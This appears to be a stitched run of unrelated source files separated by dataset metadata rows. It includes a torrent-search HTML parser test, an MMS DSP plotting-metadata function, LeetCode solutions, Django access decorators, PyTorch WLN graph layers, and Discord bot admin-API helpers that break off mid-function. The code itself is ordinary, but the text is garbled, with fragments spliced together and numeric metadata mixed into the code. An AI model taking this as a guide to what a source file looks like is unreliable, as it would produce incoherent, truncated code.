        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">1 MiB</td>
        <td class="center">4</td>
        <td class="center">2 years</td>
        <td class="green center">9</td>
        <td class="red lasttd center">1</td>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">1 GiB</td>
        <td class="center">4</td>
        <td class="center">2 years</td>
        <td class="green center">8</td>
        <td class="red lasttd center">1</td>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">1 TiB</td>
        <td class="center">4</td>
        <td class="center">2 years</td>
        <td class="green center">7</td>
        <td class="red lasttd center">1</td>
        </tr>
        <tr class="even" id="torrent_test6478745">
        <td>
        <div class="iaconbox center floatright">
        <a rel="6478745,0" class="icommentjs icon16" href="/test-t6478745.html#comment">
        <em style="font-size: 12px; margin: 0 4px 0 4px;" class="iconvalue">3</em>
        <i class="ka ka-comment"></i>
        </a>
        <a class="iverify icon16" href="/test-t6478745.html" title="Verified Torrent">
        <i class="ka ka16 ka-verify ka-green"></i>
        </a>
        <a href="#" onclick="_scq.push([]); return false;" class="partner1Button idownload icon16">
        <i class="ka ka16 ka-arrow-down partner1Button"></i>
        </a>
        <a title="Torrent magnet link"
        href="magnet:?xt=urn:btih:MAGNETURL&dn=test" class="imagnet icon16">
        <i class="ka ka16 ka-magnet"></i>
        </a>
        <a title="Download torrent file"
        href="http://torcache.net/torrent/53917.torrent?title=test" class="idownload icon16">
        <i class="ka ka16 ka-arrow-down"></i>
        </a>
        </div>
        <div class="torrentname">
        <a href="/test-t6478745.html" class="torType txtType"></a>
        <a href="/test-t6478745.html" class="normalgrey font12px plain bold"></a>
        <div class="markeredBlock torType txtType">
        <a href="/url.html" class="cellMainLink">
        <strong class="red">This should be the title</strong>
        </a>
        <span class="font11px lightgrey block">
        Posted by <i class="ka ka-verify" style="font-size: 16px;color:orange;"></i>
        <a class="plain" href="/user/riri/">riri</a> in
        <span id="cat_6478745">
        <strong><a href="/other/">Other</a> > <a href="/unsorted/">Unsorted</a></strong>
        </span>
        </span>
        </div>
        </td>
        <td class="nobr center">z bytes</td>
        <td class="center">r</td>
        <td class="center">2 years</td>
        <td class="green center">a</td>
        <td class="red lasttd center">t</td>
        </tr>
        </table>
        """
        response = mock.Mock(text=html)
        results = kickass.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 5)
        self.assertEqual(results[0]['title'], 'This should be the title')
        self.assertEqual(results[0]['url'], 'https://kickass.cd/url.html')
        self.assertEqual(results[0]['content'], 'Posted by riri in Other > Unsorted')
        self.assertEqual(results[0]['seed'], 10)
        self.assertEqual(results[0]['leech'], 1)
        self.assertEqual(results[0]['files'], 4)
        self.assertEqual(results[0]['magnetlink'], 'magnet:?xt=urn:btih:MAGNETURL&dn=test')
        self.assertEqual(results[0]['torrentfile'], 'http://torcache.net/torrent/53917.torrent?title=test')
        # Size units are parsed with a decimal (power-of-10) multiplier.
        self.assertEqual(results[0]['filesize'], 1000)
        self.assertEqual(results[1]['filesize'], 1000000)
        self.assertEqual(results[2]['filesize'], 1000000000)
        self.assertEqual(results[3]['filesize'], 1000000000000)
        self.assertEqual(results[4]['seed'], 0)
        self.assertEqual(results[4]['leech'], 0)
        self.assertEqual(results[4]['files'], None)
        self.assertEqual(results[4]['filesize'], None)
| 55.957286
| 115
| 0.464011
| 2,283
| 22,271
| 4.514674
| 0.07972
| 0.02474
| 0.027942
| 0.04657
| 0.937518
| 0.91986
| 0.917532
| 0.917532
| 0.917532
| 0.917532
| 0
| 0.049137
| 0.388667
| 22,271
| 397
| 116
| 56.098237
| 0.707896
| 0.000943
| 0
| 0.884021
| 0
| 0.131443
| 0.883675
| 0.174173
| 0
| 0
| 0
| 0
| 0.103093
| 1
| 0.005155
| false
| 0
| 0.010309
| 0
| 0.018041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c96df78d84209611b4434ff1f40f07ec27f767cf
| 7,443
|
py
|
Python
|
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | 1
|
2020-07-07T19:52:40.000Z
|
2020-07-07T19:52:40.000Z
|
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | null | null | null |
pyspedas/mms/dsp/mms_dsp_set_metadata.py
|
xnchu/pyspedas
|
62657581c0b6ed980fcd99ac34455a8b7a77dede
|
[
"MIT"
] | null | null | null |
from pytplot import options
from pyspedas import tnames
def mms_dsp_set_metadata(probe, data_rate, level, suffix=''):
    """
    This function updates the metadata for DSP data products

    Parameters:
        probe : str or list of str
            probe or list of probes, valid values for MMS probes are ['1','2','3','4'].

        data_rate : str or list of str
            instrument data rate for DSP

        level : str
            indicates level of data processing. the default if no level is specified is 'l2'

        suffix: str
            The tplot variable names will be given this suffix. By default,
            no suffix is added.
    """
    if not isinstance(probe, list): probe = [probe]
    if not isinstance(data_rate, list): data_rate = [data_rate]
    if not isinstance(level, list): level = [level]

    instrument = 'dsp'
    tvars = set(tnames())

    def _set_spec_options(tvar, ytitle, ztitle):
        # Apply the standard DSP spectrogram options to one tplot variable,
        # skipping variables that were not actually loaded.
        if tvar not in tvars:
            return
        options(tvar, 'ytitle', ytitle)
        options(tvar, 'ztitle', ztitle)
        options(tvar, 'spec', True)
        options(tvar, 'ylog', True)
        options(tvar, 'zlog', True)
        options(tvar, 'Colormap', 'jet')

    for this_probe in probe:
        mms_num = str(this_probe)
        prefix = 'mms' + mms_num + '_' + instrument + '_'
        for this_dr in data_rate:
            for this_lvl in level:
                rate_lvl = '_' + this_dr + '_' + this_lvl + suffix
                # BPSD per-sensor spectra (SCM1..SCM3), then the omni product.
                for scm in ('scm1', 'scm2', 'scm3'):
                    _set_spec_options(prefix + 'bpsd_' + scm + rate_lvl,
                                      'MMS' + mms_num + ' DSP BPSD ' + scm.upper() + ' [Hz]',
                                      'nT^2/Hz')
                _set_spec_options(prefix + 'bpsd_omni' + rate_lvl,
                                  'MMS' + mms_num + ' DSP BPSD [Hz]',
                                  'nT^2/Hz')
                # EPSD variable names carry no rate/level component; the
                # original code also (redundantly but harmlessly) re-applied
                # these options once per rate/level combination.
                for axis, label in (('omni', ''), ('x', '-X'), ('y', '-Y'), ('z', '-Z')):
                    _set_spec_options(prefix + 'epsd_' + axis + suffix,
                                      'MMS' + mms_num + ' DSP EPSD' + label + ' [Hz]',
                                      '(V/m)^2/Hz')
| 83.629213
| 162
| 0.60137
| 941
| 7,443
| 4.378321
| 0.083953
| 0.14199
| 0.15534
| 0.23301
| 0.853884
| 0.847087
| 0.847087
| 0.846602
| 0.817718
| 0.810194
| 0
| 0.006318
| 0.21322
| 7,443
| 89
| 163
| 83.629213
| 0.697234
| 0.064893
| 0
| 0
| 0
| 0
| 0.186232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.029851
| 0
| 0.044776
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e665f506257b8c0e4be30512fa1d8ef8c65ddd4
| 224
|
py
|
Python
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 5
|
2021-10-14T22:24:00.000Z
|
2022-03-24T20:11:59.000Z
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 1
|
2021-12-03T18:51:19.000Z
|
2021-12-03T18:51:19.000Z
|
geometric_algebra_attention/tensorflow/LabeledVectorAttention.py
|
klarh/geometric_algebra_attention
|
327f5d964b5bf72b6bf54b503c23ad8a0d7dc438
|
[
"MIT"
] | 2
|
2021-10-14T22:26:07.000Z
|
2022-03-24T20:23:05.000Z
|
from .. import base
from .Vector2VectorAttention import Vector2VectorAttention
class LabeledVectorAttention(base.LabeledVectorAttention, Vector2VectorAttention):
    # Re-export the backend-agnostic docstring from the base implementation;
    # the body is otherwise empty (the redundant trailing `pass` was removed
    # since the __doc__ assignment already makes the class body non-empty).
    __doc__ = base.LabeledVectorAttention.__doc__
| 24.888889
| 82
| 0.834821
| 17
| 224
| 10.529412
| 0.470588
| 0.290503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0.116071
| 224
| 8
| 83
| 28
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.2
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
6eba0d0514a6a4a51537bbf1979274d9d32b05ca
| 783
|
py
|
Python
|
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | 1
|
2021-11-28T15:03:32.000Z
|
2021-11-28T15:03:32.000Z
|
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1455.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
class Solution:
    def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
        """Return the 1-based index of the first word in ``sentence`` whose
        prefix equals ``searchWord``, or -1 if no such word exists.

        Words are separated by single spaces, matching the problem statement.
        """
        # Fixed: local variable was misspelled as `lenght`.
        prefix_len = len(searchWord)
        for index, word in enumerate(sentence.split(" "), start=1):
            if word[:prefix_len] == searchWord:
                return index
        return -1
class Solution:
    def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
        """Return the 1-based position of the first space-separated word of
        ``sentence`` that starts with ``searchWord``; -1 when none matches."""
        position = 1
        for word in sentence.split(" "):
            if word.startswith(searchWord):
                return position
            position += 1
        return -1
class Solution:
    def isPrefixOfWord(self, sentence: str, searchWord: str) -> int:
        """Return the 1-based index of the first word in ``sentence`` that
        begins with ``searchWord``, or -1 if there is none."""
        # Fixed: local variable was misspelled as `lenght`.
        prefix_len = len(searchWord)
        words = sentence.split(" ")
        for i, word in enumerate(words):
            if searchWord == word[:prefix_len]:
                return i + 1
        return -1
| 32.625
| 68
| 0.564496
| 86
| 783
| 5.139535
| 0.255814
| 0.088235
| 0.108597
| 0.20362
| 0.893665
| 0.850679
| 0.850679
| 0.850679
| 0.701357
| 0.567873
| 0
| 0.011364
| 0.325671
| 783
| 23
| 69
| 34.043478
| 0.825758
| 0
| 0
| 0.857143
| 0
| 0
| 0.003831
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
42c86c1ab5e2233c446cf26653c29d2813c6eaf6
| 1,763
|
py
|
Python
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 1
|
2021-06-11T13:47:28.000Z
|
2021-06-11T13:47:28.000Z
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 35
|
2020-06-23T11:04:44.000Z
|
2022-01-13T02:57:47.000Z
|
portal/decorators.py
|
developerayyo/eportal
|
0a18c504a62fbe559627d6a8fcb0f41abf67a361
|
[
"MIT"
] | 1
|
2020-08-04T16:17:18.000Z
|
2020-08-04T16:17:18.000Z
|
"""
This script basically allows me to use the same views for multiple users
while restricting specific aspects of the view from other users.
"""
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import user_passes_test
def student_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
    """
    Decorator for views that checks that the logged in user is a student,
    redirects to the log-in page if necessary.
    """
    decorator = user_passes_test(
        lambda user: user.is_active and user.is_student,
        login_url=login_url,
        redirect_field_name=redirect_field_name,
    )
    # Support both bare (@student_required) and parameterized usage.
    return decorator(function) if function else decorator
def lecturer_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
    """
    Decorator for views that checks that the logged in user is a lecturer,
    redirects to the log-in page if necessary.
    """
    decorator = user_passes_test(
        lambda user: user.is_active and user.is_lecturer,
        login_url=login_url,
        redirect_field_name=redirect_field_name,
    )
    # Support both bare (@lecturer_required) and parameterized usage.
    return decorator(function) if function else decorator
def admin_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url='login'):
    """
    Decorator for views that checks that the logged in user is an Administrator,
    redirects to the log-in page if necessary.
    """
    decorator = user_passes_test(
        lambda user: user.is_active and user.is_superuser,
        login_url=login_url,
        redirect_field_name=redirect_field_name,
    )
    # Support both bare (@admin_required) and parameterized usage.
    return decorator(function) if function else decorator
| 33.264151
| 97
| 0.728871
| 244
| 1,763
| 5.016393
| 0.254098
| 0.138072
| 0.180556
| 0.122549
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0.76634
| 0
| 0
| 0.20987
| 1,763
| 52
| 98
| 33.903846
| 0.878679
| 0.275099
| 0
| 0.62069
| 0
| 0
| 0.012448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0.137931
| 0.068966
| 0
| 0.37931
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
28094936a360d3b1c83455795f3dde224c5419a3
| 6,276
|
py
|
Python
|
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | 10
|
2022-01-19T19:01:35.000Z
|
2022-03-21T13:04:59.000Z
|
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | null | null | null |
holoprot/layers/mpn/wln.py
|
vsomnath/holoprot
|
9bd6c58491eec701db94ce12f8e15e2143e202b9
|
[
"MIT"
] | 3
|
2022-01-11T16:21:32.000Z
|
2022-03-11T15:33:57.000Z
|
import torch
from torch import Tensor
from typing import List, Optional, Set
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.nn import MessagePassing
from holoprot.utils import get_global_agg
class WLNConvLast(MessagePassing):
    """Final WLN read-out convolution: a single message-passing step whose
    message is a multiplicative combination of target-node, edge and
    source-node projections, aggregated with a mean.

    NOTE: torch_geometric's MessagePassing dispatches the keyword arguments
    of propagate() to message() by parameter name (x_i, x_j, edge_attr), so
    those names must not be changed.
    """

    def __init__(self, hsize: int, bias: bool):
        super(WLNConvLast, self).__init__(aggr='mean')
        self.hsize = hsize  # hidden embedding size of node/edge features
        self.bias = bias    # whether the linear projections carry a bias term
        self._build_components()

    def _build_components(self):
        # Three hsize->hsize projections; nn.Linear's third positional
        # argument is `bias`.
        self.W0 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.W1 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.W2 = nn.Linear(self.hsize, self.hsize, self.bias)

    def forward(self, x, edge_index, edge_attr):
        # Delegate to MessagePassing.propagate; message() below builds the
        # per-edge messages, aggregated with the 'mean' reducer.
        return self.propagate(edge_index, x=x, edge_attr=edge_attr)

    def message(self, x_i, x_j, edge_attr):
        # Elementwise product of projected target node (x_i), edge embedding
        # and projected source node (x_j).
        mess = self.W0(x_i) * self.W1(edge_attr) * self.W2(x_j)
        return mess
class WLNConv(MessagePassing):
    """WLN graph convolution: `depth` rounds of message passing with dropout,
    a WLNConvLast read-out after every round, and optional jumping-knowledge
    pooling ('max' or 'concat') over the per-depth read-outs.

    NOTE: MessagePassing routes propagate() kwargs to message()/update() by
    parameter name, so the x / edge_attr / x_j / inputs names are part of the
    mechanism and must not be renamed.
    """

    def __init__(self,
                 node_fdim: int,
                 edge_fdim: int,
                 depth: int, hsize: int,
                 bias: bool = False,
                 dropout: float = 0.2,
                 activation: str = 'relu',
                 jk_pool: str = None):
        super(WLNConv, self).__init__(aggr='mean') # We use mean here because the node embeddings started to explode otherwise
        self.hsize = hsize           # hidden embedding size
        self.bias = bias             # bias flag forwarded to every nn.Linear
        self.depth = depth           # number of message-passing rounds
        self.node_fdim = node_fdim   # raw node feature dimension
        self.edge_fdim = edge_fdim   # raw edge feature dimension
        self.dropout_p = dropout
        # Only 'relu' and 'lrelu' are handled; any other value leaves
        # self.activation_fn unset and fails later at call time.
        if activation == 'relu':
            self.activation_fn = F.relu
        elif activation == 'lrelu':
            self.activation_fn = F.leaky_relu
        self.jk_pool = jk_pool       # None, 'max' or 'concat'
        self._build_components()

    def _build_components(self):
        # Input embeddings plus the message (V) and update (U1/U2) projections.
        self.node_emb = nn.Linear(self.node_fdim, self.hsize, self.bias)
        self.mess_emb = nn.Linear(self.edge_fdim, self.hsize, self.bias)
        self.U1 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.U2 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.V = nn.Linear(2 * self.hsize, self.hsize, self.bias)
        self.dropouts = []
        for i in range(self.depth):
            self.dropouts.append(nn.Dropout(p=self.dropout_p))
        self.dropouts = nn.ModuleList(self.dropouts)
        self.conv_last = WLNConvLast(hsize=self.hsize, bias=self.bias)

    def forward(self, x: Tensor, edge_index: Tensor, edge_attr: Tensor):
        # Embed raw features into the hidden size; skipped when the inputs
        # already arrive at hsize (assumes edge_attr is pre-embedded in that
        # case as well — TODO confirm against callers).
        if x.size(-1) != self.hsize:
            x = self.node_emb(x)
            edge_attr = self.mess_emb(edge_attr)
        x_depths = []
        for i in range(self.depth):
            x = self.propagate(edge_index, x=x, edge_attr=edge_attr)
            x = self.dropouts[i](x)
            # Read out node embeddings at this depth with the final WLN conv.
            x_depth = self.conv_last(x=x, edge_index=edge_index, edge_attr=edge_attr)
            x_depths.append(x_depth)
        x_final = x_depths[-1]
        if self.jk_pool == 'max':
            # Jumping knowledge: elementwise max over all depths.
            x_final = torch.stack(x_depths, dim=-1).max(dim=-1)[0]
        elif self.jk_pool == "concat":
            # Jumping knowledge: concatenate all depths along the feature dim.
            x_final = torch.cat(x_depths, dim=-1)
        return x_final

    def update(self, inputs: Tensor, x: Tensor) -> Tensor:
        # Combine aggregated messages (`inputs`) with the previous node state.
        x = self.activation_fn(self.U1(x) + self.U2(inputs))
        return x

    def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
        # Per-edge message from the source node state and the edge embedding.
        nei_mess = self.activation_fn(self.V(torch.cat([x_j, edge_attr], dim=-1)))
        return nei_mess
class WLNResConv(MessagePassing):
    """WLN graph convolution with residual connections: identical to WLNConv
    except that each round adds the propagated embedding to the previous
    state (x = x + x_conv) instead of replacing it.

    NOTE: MessagePassing routes propagate() kwargs to message()/update() by
    parameter name; do not rename x / edge_attr / x_j / inputs.
    """

    def __init__(self,
                 node_fdim: int,
                 edge_fdim: int,
                 depth: int, hsize: int,
                 bias: bool = False,
                 dropout: float = 0.2,
                 activation: str = 'relu',
                 jk_pool: str = None):
        super(WLNResConv, self).__init__(aggr='mean')
        self.hsize = hsize           # hidden embedding size
        self.bias = bias             # bias flag forwarded to every nn.Linear
        self.depth = depth           # number of message-passing rounds
        self.node_fdim = node_fdim   # raw node feature dimension
        self.edge_fdim = edge_fdim   # raw edge feature dimension
        self.dropout_p = dropout
        # Only 'relu' and 'lrelu' are handled; any other value leaves
        # self.activation_fn unset and fails later at call time.
        if activation == 'relu':
            self.activation_fn = F.relu
        elif activation == 'lrelu':
            self.activation_fn = F.leaky_relu
        self.jk_pool = jk_pool       # None, 'max' or 'concat'
        self._build_components()

    def _build_components(self):
        # Input embeddings plus the message (V) and update (U1/U2) projections.
        self.node_emb = nn.Linear(self.node_fdim, self.hsize, self.bias)
        self.mess_emb = nn.Linear(self.edge_fdim, self.hsize, self.bias)
        self.U1 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.U2 = nn.Linear(self.hsize, self.hsize, self.bias)
        self.V = nn.Linear(2 * self.hsize, self.hsize, self.bias)
        self.dropouts = []
        for i in range(self.depth):
            self.dropouts.append(nn.Dropout(p=self.dropout_p))
        self.dropouts = nn.ModuleList(self.dropouts)
        self.conv_last = WLNConvLast(hsize=self.hsize, bias=self.bias)

    def forward(self, x: Tensor, edge_index: Tensor, edge_attr: Tensor,
                concat: bool = False):
        # NOTE(review): the `concat` parameter is never used in this body.
        # Embed raw features into the hidden size; skipped when the inputs
        # already arrive at hsize (assumes edge_attr is pre-embedded in that
        # case as well — TODO confirm against callers).
        if x.size(-1) != self.hsize:
            x = self.node_emb(x)
            edge_attr = self.mess_emb(edge_attr)
        x_depths = []
        for i in range(self.depth):
            x_conv = self.propagate(edge_index, x=x, edge_attr=edge_attr)
            # Residual connection: add instead of replacing the node state.
            x = x + x_conv
            x = self.dropouts[i](x)
            x_depth = self.conv_last(x=x, edge_index=edge_index, edge_attr=edge_attr)
            x_depths.append(x_depth)
        x_final = x_depths[-1]
        if self.jk_pool == 'max':
            # Jumping knowledge: elementwise max over all depths.
            x_final = torch.stack(x_depths, dim=-1).max(dim=-1)[0]
        elif self.jk_pool == "concat":
            # Jumping knowledge: concatenate all depths along the feature dim.
            x_final = torch.cat(x_depths, dim=-1)
        return x_final

    def update(self, inputs: Tensor, x: Tensor) -> Tensor:
        # Combine aggregated messages (`inputs`) with the previous node state.
        x = self.activation_fn(self.U1(x) + self.U2(inputs))
        return x

    def message(self, x_j: Tensor, edge_attr: Tensor) -> Tensor:
        # Per-edge message from the source node state and the edge embedding.
        nei_mess = self.activation_fn(self.V(torch.cat([x_j, edge_attr], dim=-1)))
        return nei_mess
if __name__ == '__main__':
    # Smoke test: build a small molecular graph (propane) and run one layer.
    from holoprot.graphs.complex import MolBuilder
    builder = MolBuilder(mpnn='gru')
    data = builder.build("CCC")
    layer = WLNConv(node_fdim=data.x.shape[-1], edge_fdim=data.edge_attr.shape[-1],
                    hsize=5, bias=False, depth=3)
    # NOTE(review): this unpacks two values, but the forward() methods
    # visible in this file return a single tensor — confirm WLNConv's
    # return signature before relying on this script.
    out1, _ = layer(data.x, data.edge_index, data.edge_attr)
| 35.457627
| 126
| 0.600064
| 876
| 6,276
| 4.100457
| 0.135845
| 0.075167
| 0.079621
| 0.061526
| 0.80206
| 0.80206
| 0.797884
| 0.797884
| 0.777004
| 0.755846
| 0
| 0.008642
| 0.280911
| 6,276
| 176
| 127
| 35.659091
| 0.787281
| 0.011632
| 0
| 0.751773
| 0
| 0
| 0.011289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.099291
| false
| 0.028369
| 0.056738
| 0.007092
| 0.234043
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95777a52809022b1a349e4237b045125dbd36f7c
| 6,342
|
py
|
Python
|
code/utils/requests.py
|
lordslair/singouins-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | null | null | null |
code/utils/requests.py
|
lordslair/singouins-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | 2
|
2022-03-07T05:29:02.000Z
|
2022-03-21T22:08:08.000Z
|
code/utils/requests.py
|
lordslair/singouins-docker-discord
|
8f82305b982e84c9c16e11ddf40d1e1b30ff437d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf8 -*-
import json
import requests
from variables import API_URL, API_ADMIN_TOKEN, PCS_URL
def api_admin_up():
    """Check that the admin API is up.

    Returns True/False from the API's 'success' flag, or None on a
    non-200 status or an empty body.
    """
    url = f'{API_URL}/admin'
    # Build the auth header as a plain dict rather than round-tripping a
    # hand-concatenated string through json.loads (fragile and slow).
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.get(url, headers=headers)
    if response.status_code == 200 and response.text:
        return bool(response.json()['success'])
    return None
def api_admin_user(discordname):
    """Look up a user by Discord name via the admin API.

    Returns the API payload, or None on a non-200 status / empty body.
    """
    url = f'{API_URL}/admin/user'
    payload = {'discordname': discordname}
    # Plain dict header instead of json.loads on a concatenated string.
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        return response.json()['payload']
    return None
def api_admin_user_validate(discordname, usermail):
    """Validate a (discordname, usermail) pair via the admin API.

    Returns the API's 'success' value, or None on a non-200 status /
    empty body.
    """
    url = f'{API_URL}/admin/user/validate'
    payload = {'discordname': discordname, 'usermail': usermail}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        return response.json()['success']
    return None
def api_admin_mypc(discordname, pcid):
    """Fetch one of a user's player characters via the admin API.

    Best-effort: returns the API payload, or None on any HTTP error,
    non-200 status, or empty/invalid body.
    """
    url = f'{API_URL}/admin/mypc'
    payload = {'discordname': discordname, 'pcid': pcid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    try:
        response = requests.post(url, json=payload, headers=headers)
        if response.status_code == 200 and response.text:
            return response.json()['payload']
